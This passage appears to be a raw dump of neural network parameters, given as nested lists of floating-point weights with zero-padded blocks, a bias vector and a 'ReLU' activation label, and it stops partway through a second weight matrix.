-0.392, -0.0289, 0.2937, -0.00315, 0.011925, -0.05807, -0.175, 0.1534, -0.2377, 0.2181, 0.1075, -0.08545, 0.02826, 0.0676, 0.004192, 0.1683, 0.0516, -0.2158, -0.1637, 0.3408, -3.031, 0.0375, 0.2369, 2.033, -1.293, -0.171, -0.0948, 0.10895, 2.771, 0.02312, 0.1627, 0.02272, -0.03552, 0.1917, -0.00959, 0.878, 0.1398, -0.385, 0.975, 0.04282], [0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09564, 0.434, -0.1124, 1.016, 0.2107, -0.6626, -1.037, 1.216, 0.2153, 0.2, 0.1572, -0.1754, 0.3079, 0.2954, 0.424, -0.701, 0.006207, -0.0682, 0.3591, 0.9565, 0.2396, 0.1805, 0.07324, 0.0871, -0.02148, -0.008606, 0.1758, -1.106, 0.7134, 1.054, -1.613, 0.2534, 1.106, 1.827, -2.092, 0.525, 0.0984, 0.601, 1.903, -0.0871, -0.247, -0.706, 0.05762, 0.2915, -0.01988, 0.9404, 0.323, -0.9023, 1.042, 0.4797], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.19, 0.026, -0.267, 0.771, -0.907, -1.083, -0.1326, -0.05957, -0.3792, -0.1764, 0.1329, 0.02359, -0.4272, 0.0412, -1.246, 0.695, -0.1864, 0.7876, 0.3013, 0.4873, 0.1984, -1.18, 0.4092, -0.1667, 0.004726, 0.463, 0.04028, 0.103, 0.2783, 0.07874, 0.7476, -1.435, -0.03043, 0.02127, 0.1266, -0.5005, 0.07654, 1.745, -0.1129, -0.05762, 0.2837, 0.006363, 1.309, 0.644, -0.25, 0.5996, -0.2051, 0.104, -0.6006, -0.0001557], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.696, -0.1296, 0.6, 0.304, 0.5645, 1.622, -0.2866, 0.8965, -0.3704, 0.07837, -0.1567, 0.01155, -0.546, -0.314, 0.423, 0.4407, 0.196, 0.0764, 1.042, 0.4346, 1.108, 1.145, -0.3384, 0.6978, -0.04303, -0.1606, 0.1752, -0.2192, 0.1384, -0.532, 0.492, 0.2803, -0.0919, -0.9775, -0.1443, 1.33, 0.929, -0.2644, -0.3257, 0.05066, -0.0672, 0.9204, 1.525, -0.01152, 1.236, 0.3835, 1.114, -1.213, -0.2335, 0.261], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8896, 0.4277, 0.10205, -0.0691, -0.501, 0.0994, 0.0777, 0.3555, 0.12225, -0.33, -0.419, 0.10583, -0.3967, -0.352, -1.009, -0.6465, -0.1438, -5.94, 6.363, 0.7676, 1.069, -0.02528, -0.5454, 0.382, -0.03217, -0.3545, 0.0832, 0.2262, -3.453, -0.811, -0.002668, -0.438, 0.2988, -0.26, -0.0647, -0.4214, 0.265, 0.1884, -0.536, -0.092, 0.3442, 0.2396, 0.1564, 0.288, 0.06155, -0.3323, -0.2278, -0.969, 0.3396, 0.06696], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3127, 0.52, -0.2478, 0.606, -0.3088, 0.03903, 0.3855, 0.2284, 0.3335, -0.6074, -0.7256, -0.511, -1.266, 0.05698, 0.8477, -0.1953, -2.18, 0.445, 0.2725, -0.002396, 0.879, -0.3022, 0.0929, -0.02382, 0.01434, -0.3657, -0.1229, 0.3542, 0.1069, 1.15, 0.3481, 0.2747, -0.615, 0.7476, -0.1103, 0.405, -0.4727, -0.006268, -1.057, -0.333, -0.337, 0.3027, 1.453, 0.8613, 0.2416, -1.398, -0.6895, 0.1718, -0.6123, 0.2708], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1936, 1.445, 0.66, 1.594, 1.121, 0.1544, -0.3206, 1.954, 1.131, 0.749, 0.11127, 1.059, 0.1779, 0.174, 0.591, -0.1564, 1.002, -0.551, 0.4216, 0.4749, 0.2327, 0.767, -0.0873, -0.0645, 0.003176, 0.5044, 0.866, -0.129, -0.6675, 2.21, -0.928, -0.775, 0.6484, 1.996, -2.227, 0.2002, -0.4517, -1.155, 2.494, -0.2151, -0.355, 0.724, 1.154, 0.5986, -0.722, 0.3555, -0.1575, 0.4822, 1.853, -0.133], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1531, 0.01854, 0.4966, -0.1763, 0.1326, -0.3687, -0.3743, -0.6665, 0.784, 0.0973, -0.01929, 0.3062, -0.8325, -0.3186, 0.1594, 0.1783, 0.334, 0.437, -1.075, 0.288, -0.1497, 0.5786, -0.01636, -0.03004, -0.005238, 0.1716, 0.2708, 1.19, -0.1462, 1.774, 0.334, 0.702, -0.3408, -0.1829, -0.4233, 0.407, 0.3462, 0.2788, -0.0926, -1.198, 0.1254, -0.11, -0.1272, 0.1508, 0.5376, 0.2017, 0.3342, 0.02666, -0.11664, 0.7144], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1471, -0.921, -0.6704, 0.2764, -0.05957, -1.801, 0.4822, 1.182, 0.1637, 1.155, 0.2086, 0.12305, 0.01457, 0.4834, -0.3706, 0.11664, -0.2024, -3.197, 4.62, -0.3801, 0.06015, 0.1744, 0.537, -1.044, 0.04147, 0.1188, 0.2003, 0.321, -0.8687, 0.4207, -0.003963, 0.4966, 0.2654, 0.552, 0.1376, -0.09186, -0.642, 0.1442, 0.3352, 0.02664, -0.3916, -0.307, -2.186, -0.4695, 0.1555, 0.3296, 0.04996, -2.674, 1.098, -0.7593], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.52, -0.2522, 0.6104, 0.87, -0.1054, -0.5884, -0.3662, 0.3022, 0.1011, -0.279, -0.3076, 0.03976, 0.1498, 0.5435, -0.0666, 0.4536, 0.0149, -0.4556, 1.277, 0.0724, -2.014, 0.254, 0.531, 0.263, -0.004025, 0.845, 0.4873, -1.299, 0.3787, 1.79, -0.1628, 1.223, 1.735, -0.4185, 0.001391, -0.2073, 0.2148, -0.58, -0.4443, -0.524, -0.08777, -1.358, -2.082, -0.288, 0.2656, -0.0689, -0.6143, -0.4749, 0.65, 0.02986], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00338, 0.003582, -0.0523, -0.04358, -0.01215, 0.0389, -0.02449, 0.00833, -0.003098, -0.01678, -0.007538, -0.01395, -0.05157, -0.0135, -0.0501, 0.0319, 0.01181, -0.03745, -0.006615, -0.04715, 0.02112, 0.04193, -0.02872, -0.02419, -0.002163, -0.01636, -0.002726, -0.00233, -0.04565, 0.0397, 0.037, -0.04382, -0.0308, -0.03113, 0.004597, -0.0223, -0.0466, -0.04105, 0.001149, -0.02751, 0.02017, 0.0174, -0.013565, -0.04218, 0.03546, -0.0467, -0.02303, 0.01857, -0.00594, -0.04324], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0394, 0.5513, -0.0374, 2.127, 0.0327, -0.00554, 0.132, 1.448, 0.3982, 1.159, -0.0985, -0.2103, 0.0355, 0.01113, 0.0402, 0.06714, -0.06696, -0.197, -0.1079, 0.1159, 0.1934, -0.1864, -0.01418, -0.10925, -0.0004625, 0.408, 0.2072, 0.01204, -0.0833, 0.02568, -3.828, -0.0571, 1.004, 2.088, -1.691, 0.03738, 0.048, 0.05368, 2.582, -0.01787, -0.1262, -0.04697, -0.02089, 0.646, 0.0435, 0.6523, 0.01881, 0.1348, 1.721, -0.094], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5444, 0.0612, -0.1003, -0.4167, 0.03864, -0.1431, 0.2052, -0.2028, -0.1437, 0.7227, -0.2727, 0.05664, -0.465, -0.05576, -0.935, -0.4873, 0.06604, -1.146, 0.752, 0.7764, 0.9995, 0.4153, -0.02591, 0.1743, 0.01086, -0.0581, -0.0899, -0.2102, -0.6494, -0.443, 0.0841, 0.0259, 0.2617, 0.4336, -0.3186, -0.6494, 0.693, -0.1593, 0.8413, 0.0956, -0.2898, -0.251, -1.686, 0.1528, 0.315, 0.5034, -0.09607, -0.5625, 
0.6016, -0.005093], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06726, -0.479, 0.8345, -0.2727, 0.1208, -2.352, 0.406, -0.927, 0.4697, 0.1746, 0.04007, 0.2964, -0.2394, 1.197, 0.1145, 0.11884, -0.727, -0.3845, -0.631, -0.8022, -1.883, 1.51, -0.628, 0.312, 0.00842, -0.747, 0.2429, -0.4175, -0.06274, 0.435, -0.4355, 1.011, 1.165, -0.4817, 0.03937, -0.436, 0.04407, -0.846, 0.4954, 0.2151, 0.02385, -0.2015, -2.215, -0.3037, 0.6353, -0.2303, 0.7046, 0.817, 1.369, 0.04977], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9287, -0.0805, 0.064, -0.263, 0.1661, -1.662, -0.1321, -1.327, 0.1661, -0.1299, -0.3345, 0.0661, 0.633, 0.03796, -0.387, -0.0128, 1.013, -0.3848, 0.007504, 0.484, -0.03001, 0.971, -0.5166, -1.186e-05, -0.02399, -0.0991, -0.4517, -0.509, 0.087, -1.372, -0.0566, 0.8457, -0.02489, 0.07526, 0.2832, 0.05038, -0.6357, -0.634, -0.4631, 0.3662, -0.4436, -0.3032, -0.4553, -0.4375, 0.478, 0.4346, -0.1278, -1.309, 0.1761, 0.1035], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0877, -0.03946, 0.0651, 1.975, -0.2476, -0.1782, 0.3708, 0.4385, -0.05276, 0.0939, -1.622, 0.3723, 0.653, -0.3389, 0.685, -0.04672, 0.09357, -0.502, -0.0821, 0.1796, 0.103, 0.0365, -0.1941, 0.534, -0.02518, -0.7637, 0.1166, -0.6436, -0.01732, 0.6904, -0.685, -0.2406, 0.4167, 2.451, -1.056, 0.3062, 0.125, 0.2166, 2.457, -0.0457, -1.418, 0.3894, -0.467, 0.3018, 0.8584, 0.902, -0.4275, 
0.684, 0.011894, -0.2035], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.137, 0.0095, -0.1389, 0.0145, 0.02005, -0.2408, -0.1231, 0.03253, 0.07886, 0.02043, -0.1368, -0.0575, 0.010185, 0.076, -0.1461, -0.091, 0.05734, -0.0659, 0.148, 0.0703, -0.06616, 0.1056, -0.07556, -0.08484, -0.004753, 0.06604, 0.07837, -0.0748, -0.1364, 0.04358, -0.1473, 0.0637, 0.09174, 0.001616, -0.11285, -0.1444, -0.05746, 0.06995, 0.05936, -0.1691, -0.0949, -0.03038, -0.0645, 0.05365, 0.03683, 0.0619, 0.0667, 0.0957, 0.0668, -0.1161], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.47, 0.409, 0.1854, 0.8687, -0.9478, -8.58, -3.508, 1.141, 0.05185, 0.314, 0.4312, 1.846, 0.2448, -0.01799, -0.1121, 1.099, 0.4792, -0.4324, 1.704, -0.6865, -0.2695, -0.3308, -0.6587, -0.2246, 0.02043, 0.5215, 0.914, 0.791, -0.733, 0.1017, -0.6235, -0.7173, 0.7275, -0.729, -1.798, 1.084, 0.6665, 0.0766, 0.1866, -0.1714, 0.6216, -0.359, 0.2822, -0.1371, -0.2101, 0.3608, 0.4004, 0.4377, 0.8843, -1.522], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5176, -0.1888, -0.11066, 0.6104, 0.3577, 1.109, 0.2131, 0.1383, -0.598, 0.03333, -0.2864, 0.04092, -0.8965, 0.5635, 0.10547, -1.185, -1.164, 0.4424, -1.358, 0.599, -0.0404, 1.982, -2.904, 0.6235, 0.00987, 0.4912, -0.393, 0.3945, -0.5093, -1.072, 0.04565, -0.4905, -0.3572, -0.4294, 0.1699, 0.1533, 0.3533, 0.9766, -0.6934, -0.7236, -0.2329, 0.09094, 0.5225, 
-0.4993, -0.4392, -0.1796, 0.507, 0.4465, 0.09717, -0.423], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.165, -0.0834, 0.2424, 0.8506, -0.4795, 0.5825, 0.983, 1.079, 0.727, 0.5293, -0.4185, -0.781, 0.3652, 0.7173, 0.2656, -0.0855, -0.06247, -0.0434, -0.4746, 0.2637, 0.03668, 1.055, -0.1847, 0.3425, -0.00714, 0.7954, 1.195, 0.5415, 0.61, 0.1735, -2.576, -1.212, 1.015, 1.157, -1.408, 0.8105, 0.13, 0.5327, 2.041, 0.1376, -0.1647, -0.5303, 0.226, 0.653, -0.1655, 0.6865, 0.1997, 0.821, 1.698, -0.9243], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3967, -0.0966, 0.525, 0.2903, -0.1411, -1.892, -1.61, 0.125, -0.4607, 0.99, 0.1499, -0.4036, -0.2087, -0.396, -1.325, -0.2297, -0.786, 0.12024, -0.475, 0.598, -2.383, 1.427, 0.2474, -0.1412, -0.0269, 0.271, -0.9507, -0.488, 0.7896, -0.006252, -0.12317, 0.1101, -0.1703, 0.4734, -0.05673, -0.1989, -0.04135, 0.3357, 0.2296, -0.1056, -0.3425, 0.098, -0.7324, 0.06094, 0.605, 0.581, -1.763, -0.742, -0.1697, -0.5815], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.245, 0.5625, 0.26, -0.2362, -0.368, -0.2268, 0.2391, 0.6636, -0.859, -0.828, -0.115, 0.453, -0.02382, 0.4822, 0.825, 0.1614, -0.0338, 0.5684, -1.883, 0.745, -0.011955, -1.048, 1.101, 0.3318, -0.0345, 0.2386, 0.01531, 0.1145, 0.3547, 0.4534, -0.166, -0.7104, -0.6567, -0.2078, -0.262, 0.3242, -0.0729, 0.726, -0.04553, -1.27, -0.633, 0.4175, 1.438, -0.3904, 
-0.006542, -1.009, 0.05093, 0.6465, -0.1598, -0.2311], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3486, 0.09894, 0.1764, 1.004, 0.217, 0.2446, 0.0575, 0.567, -0.3484, 2.129, 0.2622, -0.5176, -0.1124, -0.309, 0.1196, 0.284, 0.3794, 0.09094, -0.02074, 0.667, 0.2886, -0.04617, -0.1569, 0.04303, -0.02356, 0.368, 0.04013, 0.2134, 0.02914, 0.1919, -0.3804, 0.0649, 0.1403, 1.386, -0.3875, -0.4346, -0.0982, -0.6133, 0.617, 0.172, -0.266, 0.04846, 0.331, 0.3218, 0.507, 0.8955, -0.1508, -0.6025, -0.1422, 0.161]]
[0.08355, -0.0213261, 0.756291, -1.25082, 0.178469, -0.339158, 0.109226, -1.26214, -0.356488, -0.00829379, -0.0201183, -0.192039, -0.0892578, -0.206319, 0.105053, -0.0932226, -0.245924, 0.159416, 0.465794, -0.760039, 0.127213, 0.393189, -0.0717872, 0.319831, -0.0141183, -0.00660377, -0.703714, 0.440894, -0.403874, -0.550258, -1.33355, -1.11956, -0.731673, 0.237415, -0.827488, 0.317529, -0.741801, -0.0174412, -0.302206, -0.0996994, 0.655079, 1.25241, 0.0390987, -0.0242382, -0.385696, -0.359071, -0.155856, 0.0285971, -0.426623, 0.780925, 0.08356, -0.02133, 0.7563, -1.251, 0.1785, -0.339, 0.10925, -1.262, -0.3564, -0.00829, -0.02011, -0.192, -0.08923, -0.2063, 0.10504, -0.0932, -0.246, 0.1594, 0.4658, -0.7603, 0.1272, 0.3933, -0.0718, 0.3198, -0.01412, -0.006603, -0.7036, 0.441, -0.4038, -0.5503, -1.334, -1.119, -0.7314, 0.2374, -0.8276, 0.3176, -0.7417, -0.01744, -0.3022, -0.0997, 0.6553, 1.252, 0.0391, -0.02423, -0.3857, -0.3591, -0.1559, 0.0286, -0.4265, 0.781]
ReLU
[[0.146062, -0.00549069, 0.793907, 1.30888, 0.224081, -1.3641, -0.109635, 0.898539, 0.310022, 0.00682475, -0.00362062, 0.149834, -0.235071, 0.15789, -0.00178135, 0.48472, 0.323807, -0.598065, -0.491531, 0.324435, -0.668401, 0.304915, 0.419003, 0.298746, 0.0234912, 0.00549653, -0.179487, -1.50386, 0.0308066, 0.337636, 0.340796, 1.64739, 0.0150481, 0.33905, 0.395486, -0.785359, -0.633538, -0.038462, -3.22461, 0.624705, -0.880133, -1.00503, -0.520676, 0.0333464, 0.496559, 0.113749, -1.1159, -1.15657, 0.515279, -0.132622, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.159, -0.00827789, -0.478648, -0.485165, 1.43533, 1.08912, 0.348308, -4.84346, 0.0427388, 0.370465, -0.0192723, -0.673709, 0.160745, 0.650405, 0.856348, 0.037164, 0.0255892, -0.26288, -1.08544, -0.36311, -1.62061, -0.789267, 0.373978, -0.978965, 0.0276093, 0.0313649, 0.536809, -1.1492, -0.0940774, -0.0333346, -0.257751, 1.9695, 0.0501485, 0.0733369, -0.866354, 0.779935, 0.760352, -0.0217517, -2.00374, -0.801014, 0.214337, 1.1548, -0.967842, 0.0254242, 0.158038, -0.184218, -0.0593141, -2.33211, -0.517898, -0.317556, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.01583, 0.0282395, 0.111866, -0.52413, 0.373136, -0.0115599, -0.116923, -0.787078, -0.154454, 0.0678869, -0.00353034, 0.263966, -0.0961603, 0.54468, 0.148624, 0.115876, -0.0490365, -0.646944, 0.801084, -0.102975, 0.647824, 0.210518, 0.0134414, 0.0718505, 0.0419941, -0.00286356, -1.88786, -0.509127, 0.396081, 0.235139, -0.234269, -0.594599, -0.0888495, 0.663104, -0.110467, -0.633579, -0.740803, 0.0317191, 0.129543, 0.361322, -0.100759, 
-0.503037, -0.197447, 0.00101419, 0.236294, 0.312905, -0.351823, 0.0769389, -0.490059, -0.305079, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.17155, 0.028289, 0.00477124, 0.0251563, 0.562535, -0.0817147, 1.07524, -0.149315, 0.333289, -0.267687, 0.0251055, 0.0681931, -0.069401, 0.354327, -0.132719, 0.193532, 0.0164038, -0.262618, 0.427665, -0.274604, -0.526276, 0.369284, 0.287887, -0.181297, -0.0281393, -0.00309896, 0.0811781, 0.771188, 0.26736, -0.177761, 0.151055, -0.683415, 0.347794, 0.67458, 1.04303, -0.0356357, 0.25417, -0.0400246, 1.76959, 0.231712, -0.0273251, 0.116641, 0.376222, 0.0395626, 0.362095, -0.135576, 0.186865, -0.363663, -0.19285, -0.304186, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.955485, 0.0254362, 1.0283, -0.371288, 0.374185, -0.467278, -0.356728, -0.0264583, -0.161747, 0.501191, 0.0511949, -0.132808, -0.72633, -0.693849, 0.769499, -0.0407224, 0.0251933, 0.00979278, -0.532192, -0.257975, -1.66326, 